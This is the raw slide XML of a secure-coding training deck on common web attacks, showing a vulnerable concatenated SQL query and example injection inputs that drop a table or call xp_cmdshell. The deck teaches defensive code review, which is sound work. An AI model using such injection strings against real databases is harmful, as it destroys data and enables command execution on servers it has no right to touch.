                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="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SELECT HasShipped </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1800" b="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800" b="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FROM Shipment </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1800" b="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800" b="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WHERE ID= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="18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'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty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1001'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0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 ; drop </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty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table orders -- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="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'</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 9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1790377" y="2761613"/>
              <a:ext cx="5098109" cy="422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1154112" y="1744051"/>
            <a:ext cx="6680199" cy="64134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sqlstring="SELECT HasShipped" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        " 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FROM Shipment WHERE ID='" + Id + "'";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Striped Right Arrow 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8872360">
            <a:off x="6591844" y="1383166"/>
            <a:ext cx="1244511" cy="34170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25" descr="Funny Guy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4379" y="752836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" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1253330" y="4554390"/>
            <a:ext cx="6640514" cy="2087562"/>
            <a:chOff x="1253330" y="4554390"/>
            <a:chExt cx="6640514" cy="2087562"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1253330" y="4554390"/>
              <a:ext cx="6640514" cy="2087562"/>
              <a:chOff x="1253330" y="4313238"/>
              <a:chExt cx="6640514" cy="2087562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253330" y="4313238"/>
                <a:ext cx="6640513" cy="2087562"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 3125"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="40000" dist="2032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matte">
                <a:bevelT w="0" h="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Segoe UI" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"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1607344" y="4344834"/>
                <a:ext cx="6286500" cy="198857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r>
                  <a:rPr lang="en-US" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Downright Evil Guy</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" dirty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l">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pP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 algn="l">
                  <a:defRPr/>
                </a:pP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SELECT HasShipped </a:t>
                </a:r>
                <a:b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FROM Shipment </a:t>
                </a:r>
                <a:b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WHERE ID= '</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>1001’ ; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>exec xp_cmdshell('...') -- </a:t>
                </a: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'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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00213" y="4927452"/>
              <a:ext cx="53244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00213" y="5332265"/>
              <a:ext cx="5324475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767752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DL-blue">
  <a:themeElements>
    <a:clrScheme name="SD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194"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="277318"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F89A21"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="007CBD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="00AC24"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFB82E"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="SDL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Basics of Secure Design Development Test</Template>
  <TotalTime>513</TotalTime>
  <Words>1983</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>516</Paragraphs>
  <Slides>58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SDL-blue</vt:lpstr>
      <vt:lpstr>Code Review Training Course. Part 2: Common Web Attack  &amp; Secure Coding</vt:lpstr>
      <vt:lpstr>Out line</vt:lpstr>
      <vt:lpstr>Web Security Introduction</vt:lpstr>
      <vt:lpstr>Common Web Attack</vt:lpstr>
      <vt:lpstr>Common Web Attack</vt:lpstr>
      <vt:lpstr>Injection Flaws</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Why It's Wrong (1 of 3)</vt:lpstr>
      <vt:lpstr>Why It's Wrong (2 of 3)</vt:lpstr>
      <vt:lpstr>Why It's Wrong (3 of 3)  Your Worst Nightmare!</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Application Email</vt:lpstr>
      <vt:lpstr>Application Email</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>XSS in Action: Cookie Stealing</vt:lpstr>
      <vt:lpstr>XSS in Action: "Defacement"</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Authorization</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>File Access</vt:lpstr>
      <vt:lpstr>File Include</vt:lpstr>
      <vt:lpstr>File Access: LFI</vt:lpstr>
      <vt:lpstr>File Access: LFI</vt:lpstr>
      <vt:lpstr>File Uploading</vt:lpstr>
      <vt:lpstr>Other Attack</vt:lpstr>
      <vt:lpstr>Other Attacks</vt:lpstr>
      <vt:lpstr>Cookie Security</vt:lpstr>
      <vt:lpstr>Cookie Security</vt:lpstr>
      <vt:lpstr>Exercise: Q</vt:lpstr>
      <vt:lpstr>Exercise: A</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Input/Output Validation</vt:lpstr>
      <vt:lpstr>User Supplied Input Is The Cause</vt:lpstr>
      <vt:lpstr>Faulty Filters Worse Than No Filters</vt:lpstr>
      <vt:lpstr>Faulty Filters Worse Than No Filters</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Exercise: Q</vt:lpstr>
      <vt:lpstr>Exercise: A</vt:lpstr>
      <vt:lpstr>Exercise: Q</vt:lpstr>
      <vt:lpstr>Exercise: A</vt:lpstr>
      <vt:lpstr>Exercise: Q</vt:lpstr>
      <vt:lpstr>Exercise: A</vt:lpstr>
      <vt:lpstr>Exercise: Q</vt:lpstr>
      <vt:lpstr>Exercise: Q</vt:lpstr>
      <vt:lpstr>Exercise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NamHB1</dc:creator>
  <cp:lastModifiedBy>habachnam</cp:lastModifiedBy>
  <cp:revision>87</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-16T03:27:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-07-19T08:59:09Z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</Properties>
</file>